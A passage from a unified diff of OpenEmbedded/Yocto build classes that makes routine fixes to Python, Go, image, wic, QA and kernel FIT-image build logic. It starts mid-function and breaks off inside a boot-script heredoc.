bbfatal_log "'${PYTHON_PN} setup.py build ${DISTUTILS_BUILD_ARGS}' execution failed."
}
distutils3_do_compile[vardepsexclude] = "MACHINE"
distutils3_do_install() {
- cd ${S}
+ cd ${DISTUTILS_SETUP_PATH}
install -d ${D}${PYTHON_SITEPACKAGES_DIR}
STAGING_INCDIR=${STAGING_INCDIR} \
STAGING_LIBDIR=${STAGING_LIBDIR} \
PYTHONPATH=${D}${PYTHON_SITEPACKAGES_DIR} \
- ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} ${S}/setup.py \
+ ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} setup.py \
build --build-base=${B} install --skip-build ${DISTUTILS_INSTALL_ARGS} || \
bbfatal_log "'${PYTHON_PN} setup.py install ${DISTUTILS_INSTALL_ARGS}' execution failed."
diff --git a/meta/classes/externalsrc.bbclass b/meta/classes/externalsrc.bbclass
index d200129987..9c9451e528 100644
--- a/meta/classes/externalsrc.bbclass
+++ b/meta/classes/externalsrc.bbclass
@@ -60,7 +60,7 @@ python () {
if externalsrcbuild:
d.setVar('B', externalsrcbuild)
else:
- d.setVar('B', '${WORKDIR}/${BPN}-${PV}/')
+ d.setVar('B', '${WORKDIR}/${BPN}-${PV}')
local_srcuri = []
fetch = bb.fetch2.Fetch((d.getVar('SRC_URI') or '').split(), d)
@@ -108,6 +108,15 @@ python () {
if local_srcuri and task in fetch_tasks:
continue
bb.build.deltask(task, d)
+ if bb.data.inherits_class('reproducible_build', d) and task == 'do_unpack':
+ # The reproducible_build's create_source_date_epoch_stamp function must
+ # be run after the source is available and before the
+ # do_deploy_source_date_epoch task. In the normal case, it's attached
+ # to do_unpack as a postfuncs, but since we removed do_unpack (above)
+ # we need to move the function elsewhere. The easiest thing to do is
+ # move it into the prefuncs of the do_deploy_source_date_epoch task.
+ # This is safe, as externalsrc runs with the source already unpacked.
+ d.prependVarFlag('do_deploy_source_date_epoch', 'prefuncs', 'create_source_date_epoch_stamp ')
d.prependVarFlag('do_compile', 'prefuncs', "externalsrc_compile_prefunc ")
d.prependVarFlag('do_configure', 'prefuncs', "externalsrc_configure_prefunc ")
@@ -190,6 +199,7 @@ def srctree_hash_files(d, srcdir=None):
import shutil
import subprocess
import tempfile
+ import hashlib
s_dir = srcdir or d.getVar('EXTERNALSRC')
git_dir = None
@@ -197,6 +207,10 @@ def srctree_hash_files(d, srcdir=None):
try:
git_dir = os.path.join(s_dir,
subprocess.check_output(['git', '-C', s_dir, 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip())
+ top_git_dir = os.path.join(d.getVar("TOPDIR"),
+ subprocess.check_output(['git', '-C', d.getVar("TOPDIR"), 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip())
+ if git_dir == top_git_dir:
+ git_dir = None
except subprocess.CalledProcessError:
pass
@@ -210,7 +224,18 @@ def srctree_hash_files(d, srcdir=None):
env = os.environ.copy()
env['GIT_INDEX_FILE'] = tmp_index.name
subprocess.check_output(['git', 'add', '-A', '.'], cwd=s_dir, env=env)
- sha1 = subprocess.check_output(['git', 'write-tree'], cwd=s_dir, env=env).decode("utf-8")
+ git_sha1 = subprocess.check_output(['git', 'write-tree'], cwd=s_dir, env=env).decode("utf-8")
+ if os.path.exists(os.path.join(s_dir, ".gitmodules")) and os.path.getsize(os.path.join(s_dir, ".gitmodules")) > 0:
+ submodule_helper = subprocess.check_output(["git", "config", "--file", ".gitmodules", "--get-regexp", "path"], cwd=s_dir, env=env).decode("utf-8")
+ for line in submodule_helper.splitlines():
+ module_dir = os.path.join(s_dir, line.rsplit(maxsplit=1)[1])
+ if os.path.isdir(module_dir):
+ proc = subprocess.Popen(['git', 'add', '-A', '.'], cwd=module_dir, env=env, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
+ proc.communicate()
+ proc = subprocess.Popen(['git', 'write-tree'], cwd=module_dir, env=env, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
+ stdout, _ = proc.communicate()
+ git_sha1 += stdout.decode("utf-8")
+ sha1 = hashlib.sha1(git_sha1.encode("utf-8")).hexdigest()
with open(oe_hash_file, 'w') as fobj:
fobj.write(sha1)
ret = oe_hash_file + ':True'
diff --git a/meta/classes/fs-uuid.bbclass b/meta/classes/fs-uuid.bbclass
index 9b53dfba7a..731ea575bd 100644
--- a/meta/classes/fs-uuid.bbclass
+++ b/meta/classes/fs-uuid.bbclass
@@ -4,7 +4,7 @@
def get_rootfs_uuid(d):
import subprocess
rootfs = d.getVar('ROOTFS')
- output = subprocess.check_output(['tune2fs', '-l', rootfs])
+ output = subprocess.check_output(['tune2fs', '-l', rootfs], text=True)
for line in output.split('\n'):
if line.startswith('Filesystem UUID:'):
uuid = line.split()[-1]
diff --git a/meta/classes/go.bbclass b/meta/classes/go.bbclass
index a9e31b50ea..21b1a0271e 100644
--- a/meta/classes/go.bbclass
+++ b/meta/classes/go.bbclass
@@ -115,9 +115,10 @@ go_do_install() {
install -d ${D}${libdir}/go/src/${GO_IMPORT}
tar -C ${S}/src/${GO_IMPORT} -cf - --exclude-vcs --exclude '*.test' --exclude 'testdata' . | \
tar -C ${D}${libdir}/go/src/${GO_IMPORT} --no-same-owner -xf -
- tar -C ${B} -cf - --exclude-vcs pkg | tar -C ${D}${libdir}/go --no-same-owner -xf -
+ tar -C ${B} -cf - --exclude-vcs --exclude '*.test' --exclude 'testdata' pkg | \
+ tar -C ${D}${libdir}/go --no-same-owner -xf -
- if [ -n "`ls ${B}/${GO_BUILD_BINDIR}/`" ]; then
+ if ls ${B}/${GO_BUILD_BINDIR}/* >/dev/null 2>/dev/null ; then
install -d ${D}${bindir}
install -m 0755 ${B}/${GO_BUILD_BINDIR}/* ${D}${bindir}/
fi
@@ -144,11 +145,11 @@ FILES_${PN}-staticdev = "${libdir}/go/pkg"
INSANE_SKIP_${PN} += "ldflags"
-# Add -buildmode=pie to GOBUILDFLAGS to satisfy "textrel" QA checking, but mips
-# doesn't support -buildmode=pie, so skip the QA checking for mips and its
-# variants.
+# Add -buildmode=pie to GOBUILDFLAGS to satisfy "textrel" QA checking, but
+# windows/mips/riscv doesn't support -buildmode=pie, so skip the QA checking
+# for windows/mips/riscv and their variants.
python() {
- if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH'):
+ if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH') or 'windows' in d.getVar('TARGET_GOOS'):
d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel")
else:
d.appendVar('GOBUILDFLAGS', ' -buildmode=pie')
diff --git a/meta/classes/goarch.bbclass b/meta/classes/goarch.bbclass
index 1099b95769..ecd3044edd 100644
--- a/meta/classes/goarch.bbclass
+++ b/meta/classes/goarch.bbclass
@@ -114,6 +114,8 @@ def go_map_mips(a, f, d):
def go_map_os(o, d):
if o.startswith('linux'):
return 'linux'
+ elif o.startswith('mingw'):
+ return 'windows'
return o
diff --git a/meta/classes/grub-efi-cfg.bbclass b/meta/classes/grub-efi-cfg.bbclass
index 3a2cdd698b..ea21b3de3d 100644
--- a/meta/classes/grub-efi-cfg.bbclass
+++ b/meta/classes/grub-efi-cfg.bbclass
@@ -120,3 +120,4 @@ python build_efi_cfg() {
cfgfile.close()
}
+build_efi_cfg[vardepsexclude] += "OVERRIDES"
diff --git a/meta/classes/image-live.bbclass b/meta/classes/image-live.bbclass
index 54058b350d..2fa839b0de 100644
--- a/meta/classes/image-live.bbclass
+++ b/meta/classes/image-live.bbclass
@@ -30,7 +30,7 @@ do_bootimg[depends] += "dosfstools-native:do_populate_sysroot \
virtual/kernel:do_deploy \
${MLPREFIX}syslinux:do_populate_sysroot \
syslinux-native:do_populate_sysroot \
- ${PN}:do_image_${@d.getVar('LIVE_ROOTFS_TYPE').replace('-', '_')} \
+ ${@'%s:do_image_%s' % (d.getVar('PN'), d.getVar('LIVE_ROOTFS_TYPE').replace('-', '_')) if d.getVar('ROOTFS') else ''} \
"
@@ -261,4 +261,4 @@ python do_bootimg() {
do_bootimg[subimages] = "hddimg iso"
do_bootimg[imgsuffix] = "."
-addtask bootimg before do_image_complete
+addtask bootimg before do_image_complete after do_rootfs
diff --git a/meta/classes/image.bbclass b/meta/classes/image.bbclass
index 459d872b4a..fbf7206d04 100644
--- a/meta/classes/image.bbclass
+++ b/meta/classes/image.bbclass
@@ -38,7 +38,7 @@ IMAGE_FEATURES[validitems] += "debug-tweaks read-only-rootfs stateless-rootfs em
# Generate companion debugfs?
IMAGE_GEN_DEBUGFS ?= "0"
-# These pacackages will be installed as additional into debug rootfs
+# These packages will be installed as additional into debug rootfs
IMAGE_INSTALL_DEBUGFS ?= ""
# These packages will be removed from a read-only rootfs after all other
@@ -115,7 +115,7 @@ def rootfs_command_variables(d):
'IMAGE_PREPROCESS_COMMAND','RPM_PREPROCESS_COMMANDS','RPM_POSTPROCESS_COMMANDS','DEB_PREPROCESS_COMMANDS','DEB_POSTPROCESS_COMMANDS']
python () {
- variables = rootfs_command_variables(d) + sdk_command_variables(d)
+ variables = rootfs_command_variables(d)
for var in variables:
if d.getVar(var, False):
d.setVarFlag(var, 'func', '1')
@@ -124,7 +124,7 @@ python () {
def rootfs_variables(d):
from oe.rootfs import variable_depends
variables = ['IMAGE_DEVICE_TABLE','IMAGE_DEVICE_TABLES','BUILD_IMAGES_FROM_FEEDS','IMAGE_TYPES_MASKED','IMAGE_ROOTFS_ALIGNMENT','IMAGE_OVERHEAD_FACTOR','IMAGE_ROOTFS_SIZE','IMAGE_ROOTFS_EXTRA_SPACE',
- 'IMAGE_ROOTFS_MAXSIZE','IMAGE_NAME','IMAGE_LINK_NAME','IMAGE_MANIFEST','DEPLOY_DIR_IMAGE','IMAGE_FSTYPES','IMAGE_INSTALL_COMPLEMENTARY','IMAGE_LINGUAS', 'IMAGE_LINGUAS_COMPLEMENTARY',
+ 'IMAGE_ROOTFS_MAXSIZE','IMAGE_NAME','IMAGE_LINK_NAME','IMAGE_MANIFEST','DEPLOY_DIR_IMAGE','IMAGE_FSTYPES','IMAGE_INSTALL_COMPLEMENTARY','IMAGE_LINGUAS', 'IMAGE_LINGUAS_COMPLEMENTARY', 'IMAGE_LOCALES_ARCHIVE',
'MULTILIBRE_ALLOW_REP','MULTILIB_TEMP_ROOTFS','MULTILIB_VARIANTS','MULTILIBS','ALL_MULTILIB_PACKAGE_ARCHS','MULTILIB_GLOBAL_VARIANTS','BAD_RECOMMENDATIONS','NO_RECOMMENDATIONS',
'PACKAGE_ARCHS','PACKAGE_CLASSES','TARGET_VENDOR','TARGET_ARCH','TARGET_OS','OVERRIDES','BBEXTENDVARIANT','FEED_DEPLOYDIR_BASE_URI','INTERCEPT_DIR','USE_DEVFS',
'CONVERSIONTYPES', 'IMAGE_GEN_DEBUGFS', 'ROOTFS_RO_UNNEEDED', 'IMGDEPLOYDIR', 'PACKAGE_EXCLUDE_COMPLEMENTARY', 'REPRODUCIBLE_TIMESTAMP_ROOTFS', 'IMAGE_INSTALL_DEBUGFS']
@@ -176,10 +176,15 @@ IMAGE_LINGUAS ?= "de-de fr-fr en-gb"
LINGUAS_INSTALL ?= "${@" ".join(map(lambda s: "locale-base-%s" % s, d.getVar('IMAGE_LINGUAS').split()))}"
+# per default create a locale archive
+IMAGE_LOCALES_ARCHIVE ?= '1'
+
# Prefer image, but use the fallback files for lookups if the image ones
# aren't yet available.
PSEUDO_PASSWD = "${IMAGE_ROOTFS}:${STAGING_DIR_NATIVE}"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/intercept_scripts,${WORKDIR}/oe-rootfs-repo,${WORKDIR}/sstate-build-image_complete"
+
PACKAGE_EXCLUDE ??= ""
PACKAGE_EXCLUDE[type] = "list"
@@ -306,7 +311,7 @@ fakeroot python do_image_qa () {
except oe.utils.ImageQAFailed as e:
qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (e.name, e.description)
except Exception as e:
- qamsg = qamsg + '\tImage QA function %s failed\n' % cmd
+ qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (cmd, e)
if qamsg:
imgname = d.getVar('IMAGE_NAME')
@@ -432,7 +437,7 @@ python () {
localdata.delVar('DATETIME')
localdata.delVar('DATE')
localdata.delVar('TMPDIR')
- vardepsexclude = (d.getVarFlag('IMAGE_CMD_' + realt, 'vardepsexclude', True) or '').split()
+ vardepsexclude = (d.getVarFlag('IMAGE_CMD_' + realt, 'vardepsexclude') or '').split()
for dep in vardepsexclude:
localdata.delVar(dep)
@@ -660,7 +665,7 @@ reproducible_final_image_task () {
fi
# Set mtime of all files to a reproducible value
bbnote "reproducible_final_image_task: mtime set to $REPRODUCIBLE_TIMESTAMP_ROOTFS"
- find ${IMAGE_ROOTFS} -exec touch -h --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS {} \;
+ find ${IMAGE_ROOTFS} -print0 | xargs -0 touch -h --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS
fi
}
diff --git a/meta/classes/image_types.bbclass b/meta/classes/image_types.bbclass
index f82f1d8862..6dc0e094d0 100644
--- a/meta/classes/image_types.bbclass
+++ b/meta/classes/image_types.bbclass
@@ -126,7 +126,7 @@ IMAGE_CMD_squashfs-lz4 = "mksquashfs ${IMAGE_ROOTFS} ${IMGDEPLOYDIR}/${IMAGE_NAM
# required when extracting, but it seems prudent to use it in both cases.
IMAGE_CMD_TAR ?= "tar"
# ignore return code 1 "file changed as we read it" as other tasks(e.g. do_image_wic) may be hardlinking rootfs
-IMAGE_CMD_tar = "${IMAGE_CMD_TAR} --numeric-owner -cf ${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.tar -C ${IMAGE_ROOTFS} . || [ $? -eq 1 ]"
+IMAGE_CMD_tar = "${IMAGE_CMD_TAR} --sort=name --format=posix --numeric-owner -cf ${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.tar -C ${IMAGE_ROOTFS} . || [ $? -eq 1 ]"
do_image_cpio[cleandirs] += "${WORKDIR}/cpio_append"
IMAGE_CMD_cpio () {
@@ -240,7 +240,7 @@ EXTRA_IMAGECMD_jffs2 ?= "--pad ${JFFS2_ENDIANNESS} --eraseblock=${JFFS2_ERASEBLO
EXTRA_IMAGECMD_ext2 ?= "-i 4096"
EXTRA_IMAGECMD_ext3 ?= "-i 4096"
EXTRA_IMAGECMD_ext4 ?= "-i 4096"
-EXTRA_IMAGECMD_btrfs ?= "-n 4096"
+EXTRA_IMAGECMD_btrfs ?= "-n 4096 --shrink"
EXTRA_IMAGECMD_f2fs ?= ""
do_image_cpio[depends] += "cpio-native:do_populate_sysroot"
diff --git a/meta/classes/image_types_wic.bbclass b/meta/classes/image_types_wic.bbclass
index 196c86814e..ae00acc5ea 100644
--- a/meta/classes/image_types_wic.bbclass
+++ b/meta/classes/image_types_wic.bbclass
@@ -3,9 +3,9 @@
WICVARS ?= "\
BBLAYERS IMGDEPLOYDIR DEPLOY_DIR_IMAGE FAKEROOTCMD IMAGE_BASENAME IMAGE_BOOT_FILES \
IMAGE_LINK_NAME IMAGE_ROOTFS INITRAMFS_FSTYPES INITRD INITRD_LIVE ISODIR RECIPE_SYSROOT_NATIVE \
- ROOTFS_SIZE STAGING_DATADIR STAGING_DIR STAGING_LIBDIR TARGET_SYS \
+ ROOTFS_SIZE STAGING_DATADIR STAGING_DIR STAGING_LIBDIR TARGET_SYS HOSTTOOLS_DIR \
KERNEL_IMAGETYPE MACHINE INITRAMFS_IMAGE INITRAMFS_IMAGE_BUNDLE INITRAMFS_LINK_NAME APPEND \
- ASSUME_PROVIDED"
+ ASSUME_PROVIDED PSEUDO_IGNORE_PATHS"
inherit ${@bb.utils.contains('INITRAMFS_IMAGE_BUNDLE', '1', 'kernel-artifact-names', '', d)}
@@ -29,17 +29,24 @@ WIC_CREATE_EXTRA_ARGS ?= ""
IMAGE_CMD_wic () {
out="${IMGDEPLOYDIR}/${IMAGE_NAME}"
build_wic="${WORKDIR}/build-wic"
+ tmp_wic="${WORKDIR}/tmp-wic"
wks="${WKS_FULL_PATH}"
+ if [ -e "$tmp_wic" ]; then
+ # Ensure we don't have any junk leftover from a previously interrupted
+ # do_image_wic execution
+ rm -rf "$tmp_wic"
+ fi
if [ -z "$wks" ]; then
bbfatal "No kickstart files from WKS_FILES were found: ${WKS_FILES}. Please set WKS_FILE or WKS_FILES appropriately."
fi
-
- BUILDDIR="${TOPDIR}" wic create "$wks" --vars "${STAGING_DIR}/${MACHINE}/imgdata/" -e "${IMAGE_BASENAME}" -o "$build_wic/" ${WIC_CREATE_EXTRA_ARGS}
+ BUILDDIR="${TOPDIR}" PSEUDO_UNLOAD=1 wic create "$wks" --vars "${STAGING_DIR}/${MACHINE}/imgdata/" -e "${IMAGE_BASENAME}" -o "$build_wic/" -w "$tmp_wic" ${WIC_CREATE_EXTRA_ARGS}
mv "$build_wic/$(basename "${wks%.wks}")"*.direct "$out${IMAGE_NAME_SUFFIX}.wic"
}
IMAGE_CMD_wic[vardepsexclude] = "WKS_FULL_PATH WKS_FILES TOPDIR"
do_image_wic[cleandirs] = "${WORKDIR}/build-wic"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/build-wic"
+
# Rebuild when the wks file or vars in WICVARS change
USING_WIC = "${@bb.utils.contains_any('IMAGE_FSTYPES', 'wic ' + ' '.join('wic.%s' % c for c in '${CONVERSIONTYPES}'.split()), '1', '', d)}"
WKS_FILE_CHECKSUM = "${@'${WKS_FULL_PATH}:%s' % os.path.exists('${WKS_FULL_PATH}') if '${USING_WIC}' else ''}"
@@ -87,6 +94,10 @@ python do_write_wks_template () {
bb.utils.copyfile(wks_file, "%s/%s" % (depdir, basename + '-' + os.path.basename(wks_file)))
}
+do_flush_pseudodb() {
+ ${FAKEROOTENV} ${FAKEROOTCMD} -S
+}
+
python () {
if d.getVar('USING_WIC'):
wks_file_u = d.getVar('WKS_FULL_PATH', False)
@@ -140,6 +151,7 @@ python do_rootfs_wicenv () {
depdir = d.getVar('IMGDEPLOYDIR')
bb.utils.copyfile(os.path.join(outdir, basename) + '.env', os.path.join(depdir, basename) + '.env')
}
+addtask do_flush_pseudodb after do_rootfs before do_image do_image_qa
addtask do_rootfs_wicenv after do_image before do_image_wic
do_rootfs_wicenv[vardeps] += "${WICVARS}"
do_rootfs_wicenv[prefuncs] = 'set_image_size'
diff --git a/meta/classes/insane.bbclass b/meta/classes/insane.bbclass
index b5c6b2186f..d6da53252f 100644
--- a/meta/classes/insane.bbclass
+++ b/meta/classes/insane.bbclass
@@ -174,7 +174,7 @@ def package_qa_check_useless_rpaths(file, name, d, elf, messages):
if rpath_eq(rpath, libdir) or rpath_eq(rpath, base_libdir):
# The dynamic linker searches both these places anyway. There is no point in
# looking there again.
- package_qa_add_message(messages, "useless-rpaths", "%s: %s contains probably-redundant RPATH %s" % (name, package_qa_clean_path(file, d), rpath))
+ package_qa_add_message(messages, "useless-rpaths", "%s: %s contains probably-redundant RPATH %s" % (name, package_qa_clean_path(file, d, name), rpath))
QAPATHTEST[dev-so] = "package_qa_check_dev"
def package_qa_check_dev(path, name, d, elf, messages):
@@ -183,8 +183,8 @@ def package_qa_check_dev(path, name, d, elf, messages):
"""
if not name.endswith("-dev") and not name.endswith("-dbg") and not name.endswith("-ptest") and not name.startswith("nativesdk-") and path.endswith(".so") and os.path.islink(path):
- package_qa_add_message(messages, "dev-so", "non -dev/-dbg/nativesdk- package contains symlink .so: %s path '%s'" % \
- (name, package_qa_clean_path(path,d)))
+ package_qa_add_message(messages, "dev-so", "non -dev/-dbg/nativesdk- package %s contains symlink .so '%s'" % \
+ (name, package_qa_clean_path(path, d, name)))
QAPATHTEST[dev-elf] = "package_qa_check_dev_elf"
def package_qa_check_dev_elf(path, name, d, elf, messages):
@@ -194,8 +194,8 @@ def package_qa_check_dev_elf(path, name, d, elf, messages):
install link-time .so files that are linker scripts.
"""
if name.endswith("-dev") and path.endswith(".so") and not os.path.islink(path) and elf:
- package_qa_add_message(messages, "dev-elf", "-dev package contains non-symlink .so: %s path '%s'" % \
- (name, package_qa_clean_path(path,d)))
+ package_qa_add_message(messages, "dev-elf", "-dev package %s contains non-symlink .so '%s'" % \
+ (name, package_qa_clean_path(path, d, name)))
QAPATHTEST[staticdev] = "package_qa_check_staticdev"
def package_qa_check_staticdev(path, name, d, elf, messages):
@@ -208,7 +208,7 @@ def package_qa_check_staticdev(path, name, d, elf, messages):
if not name.endswith("-pic") and not name.endswith("-staticdev") and not name.endswith("-ptest") and path.endswith(".a") and not path.endswith("_nonshared.a") and not '/usr/lib/debug-static/' in path and not '/.debug-static/' in path:
package_qa_add_message(messages, "staticdev", "non -staticdev package contains static .a library: %s path '%s'" % \
- (name, package_qa_clean_path(path,d)))
+ (name, package_qa_clean_path(path,d, name)))
QAPATHTEST[mime] = "package_qa_check_mime"
def package_qa_check_mime(path, name, d, elf, messages):
@@ -452,12 +452,14 @@ def package_qa_check_buildpaths(path, name, d, elf, messages):
"""
Check for build paths inside target files and error if not found in the whitelist
"""
+ import stat
# Ignore .debug files, not interesting
if path.find(".debug") != -1:
return
- # Ignore symlinks
- if os.path.islink(path):
+ # Ignore symlinks/devs/fifos
+ mode = os.lstat(path).st_mode
+ if stat.S_ISLNK(mode) or stat.S_ISBLK(mode) or stat.S_ISFIFO(mode) or stat.S_ISCHR(mode) or stat.S_ISSOCK(mode):
return
tmpdir = bytes(d.getVar('TMPDIR'), encoding="utf-8")
@@ -945,7 +947,7 @@ def package_qa_check_host_user(path, name, d, elf, messages):
dest = d.getVar('PKGDEST')
pn = d.getVar('PN')
- home = os.path.join(dest, 'home')
+ home = os.path.join(dest, name, 'home')
if path == home or path.startswith(home + os.sep):
return
@@ -1012,26 +1014,6 @@ python do_package_qa () {
logdir = d.getVar('T')
pn = d.getVar('PN')
- # Check the compile log for host contamination
- compilelog = os.path.join(logdir,"log.do_compile")
-
- if os.path.exists(compilelog):
- statement = "grep -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s > /dev/null" % compilelog
- if subprocess.call(statement, shell=True) == 0:
- msg = "%s: The compile log indicates that host include and/or library paths were used.\n \
- Please check the log '%s' for more information." % (pn, compilelog)
- package_qa_handle_error("compile-host-path", msg, d)
-
- # Check the install log for host contamination
- installlog = os.path.join(logdir,"log.do_install")
-
- if os.path.exists(installlog):
- statement = "grep -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s > /dev/null" % installlog
- if subprocess.call(statement, shell=True) == 0:
- msg = "%s: The install log indicates that host include and/or library paths were used.\n \
- Please check the log '%s' for more information." % (pn, installlog)
- package_qa_handle_error("install-host-path", msg, d)
-
# Scan the packages...
pkgdest = d.getVar('PKGDEST')
packages = set((d.getVar('PACKAGES') or '').split())
@@ -1210,7 +1192,7 @@ python do_qa_configure() {
if bb.data.inherits_class('autotools', d) and not skip_configure_unsafe:
bb.note("Checking autotools environment for common misconfiguration")
for root, dirs, files in os.walk(workdir):
- statement = "grep -q -F -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s" % \
+ statement = "grep -q -F -e 'is unsafe for cross-compilation' %s" % \
os.path.join(root,"config.log")
if "config.log" in files:
if subprocess.call(statement, shell=True) == 0:
diff --git a/meta/classes/kernel-arch.bbclass b/meta/classes/kernel-arch.bbclass
index 07ec242e63..4cd08b96fb 100644
--- a/meta/classes/kernel-arch.bbclass
+++ b/meta/classes/kernel-arch.bbclass
@@ -61,8 +61,8 @@ HOST_LD_KERNEL_ARCH ?= "${TARGET_LD_KERNEL_ARCH}"
TARGET_AR_KERNEL_ARCH ?= ""
HOST_AR_KERNEL_ARCH ?= "${TARGET_AR_KERNEL_ARCH}"
-KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH}"
+KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH} -fdebug-prefix-map=${STAGING_KERNEL_BUILDDIR}=${KERNEL_SRC_PATH}"
KERNEL_LD = "${CCACHE}${HOST_PREFIX}ld.bfd ${HOST_LD_KERNEL_ARCH}"
KERNEL_AR = "${CCACHE}${HOST_PREFIX}ar ${HOST_AR_KERNEL_ARCH}"
-TOOLCHAIN = "gcc"
+TOOLCHAIN ?= "gcc"
diff --git a/meta/classes/kernel-devicetree.bbclass b/meta/classes/kernel-devicetree.bbclass
index 81dda8003f..27a4905ac6 100644
--- a/meta/classes/kernel-devicetree.bbclass
+++ b/meta/classes/kernel-devicetree.bbclass
@@ -1,14 +1,20 @@
# Support for device tree generation
-PACKAGES_append = " \
- ${KERNEL_PACKAGE_NAME}-devicetree \
- ${@[d.getVar('KERNEL_PACKAGE_NAME') + '-image-zimage-bundle', ''][d.getVar('KERNEL_DEVICETREE_BUNDLE') != '1']} \
-"
+python () {
+ if not bb.data.inherits_class('nopackages', d):
+ d.appendVar("PACKAGES", " ${KERNEL_PACKAGE_NAME}-devicetree")
+ if d.getVar('KERNEL_DEVICETREE_BUNDLE') == '1':
+ d.appendVar("PACKAGES", " ${KERNEL_PACKAGE_NAME}-image-zimage-bundle")
+}
+
FILES_${KERNEL_PACKAGE_NAME}-devicetree = "/${KERNEL_IMAGEDEST}/*.dtb /${KERNEL_IMAGEDEST}/*.dtbo"
FILES_${KERNEL_PACKAGE_NAME}-image-zimage-bundle = "/${KERNEL_IMAGEDEST}/zImage-*.dtb.bin"
# Generate kernel+devicetree bundle
KERNEL_DEVICETREE_BUNDLE ?= "0"
+# dtc flags passed via DTC_FLAGS env variable
+KERNEL_DTC_FLAGS ?= ""
+
normalize_dtb () {
dtb="$1"
if echo $dtb | grep -q '/dts/'; then
@@ -50,6 +56,10 @@ do_configure_append() {
}
do_compile_append() {
+ if [ -n "${KERNEL_DTC_FLAGS}" ]; then
+ export DTC_FLAGS="${KERNEL_DTC_FLAGS}"
+ fi
+
for dtbf in ${KERNEL_DEVICETREE}; do
dtb=`normalize_dtb "$dtbf"`
oe_runmake $dtb CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS}
diff --git a/meta/classes/kernel-fitimage.bbclass b/meta/classes/kernel-fitimage.bbclass
index 72b05ff8d1..7c7bcd3fc0 100644
--- a/meta/classes/kernel-fitimage.bbclass
+++ b/meta/classes/kernel-fitimage.bbclass
@@ -1,5 +1,7 @@
inherit kernel-uboot kernel-artifact-names uboot-sign
+KERNEL_IMAGETYPE_REPLACEMENT = ""
+
python __anonymous () {
kerneltypes = d.getVar('KERNEL_IMAGETYPES') or ""
if 'fitImage' in kerneltypes.split():
@@ -21,6 +23,8 @@ python __anonymous () {
else:
replacementtype = "zImage"
+ d.setVar("KERNEL_IMAGETYPE_REPLACEMENT", replacementtype)
+
# Override KERNEL_IMAGETYPE_FOR_MAKE variable, which is internal
# to kernel.bbclass . We have to override it, since we pack zImage
# (at least for now) into the fitImage .
@@ -45,6 +49,8 @@ python __anonymous () {
if d.getVar('UBOOT_SIGN_ENABLE') == "1" and d.getVar('UBOOT_DTB_BINARY'):
uboot_pn = d.getVar('PREFERRED_PROVIDER_u-boot') or 'u-boot'
d.appendVarFlag('do_assemble_fitimage', 'depends', ' %s:do_populate_sysroot' % uboot_pn)
+ if d.getVar('INITRAMFS_IMAGE_BUNDLE') == "1":
+ d.appendVarFlag('do_assemble_fitimage_initramfs', 'depends', ' %s:do_populate_sysroot' % uboot_pn)
}
# Options for the device tree compiler passed to mkimage '-D' feature:
@@ -56,6 +62,12 @@ FIT_HASH_ALG ?= "sha256"
# fitImage Signature Algo
FIT_SIGN_ALG ?= "rsa2048"
+# fitImage Padding Algo
+FIT_PAD_ALG ?= "pkcs-1.5"
+
+# Arguments passed to mkimage for signing
+UBOOT_MKIMAGE_SIGN_ARGS ?= ""
+
#
# Emit the fitImage ITS header
#
@@ -124,7 +136,7 @@ fitimage_emit_section_kernel() {
fi
cat << EOF >> ${1}
- kernel@${2} {
+ kernel-${2} {
description = "Linux kernel";
data = /incbin/("${3}");
type = "kernel";
@@ -133,7 +145,7 @@ fitimage_emit_section_kernel() {
compression = "${4}";
load = <${UBOOT_LOADADDRESS}>;
entry = <${ENTRYPOINT}>;
- hash@1 {
+ hash-1 {
algo = "${kernel_csum}";
};
};
@@ -160,14 +172,14 @@ fitimage_emit_section_dtb() {
dtb_loadline="load = <${UBOOT_DTB_LOADADDRESS}>;"
fi
cat << EOF >> ${1}
- fdt@${2} {
+ fdt-${2} {
description = "Flattened Device Tree blob";
data = /incbin/("${3}");
type = "flat_dt";
arch = "${UBOOT_ARCH}";
compression = "none";
${dtb_loadline}
- hash@1 {
+ hash-1 {
algo = "${dtb_csum}";
};
};
@@ -175,6 +187,43 @@ EOF
}
#
+# Emit the fitImage ITS u-boot script section
+#
+# $1 ... .its filename
+# $2 ... Image counter
+# $3 ... Path to boot script image
+fitimage_emit_section_boot_script() {
+
+ bootscr_csum="${FIT_HASH_ALG}"
+ bootscr_sign_algo="${FIT_SIGN_ALG}"
+ bootscr_sign_keyname="${UBOOT_SIGN_IMG_KEYNAME}"
+
+ cat << EOF >> $1
+ bootscr-$2 {
+ description = "U-boot script";
+ data = /incbin/("$3");
+ type = "script";
+ arch = "${UBOOT_ARCH}";
+ compression = "none";
+ hash-1 {
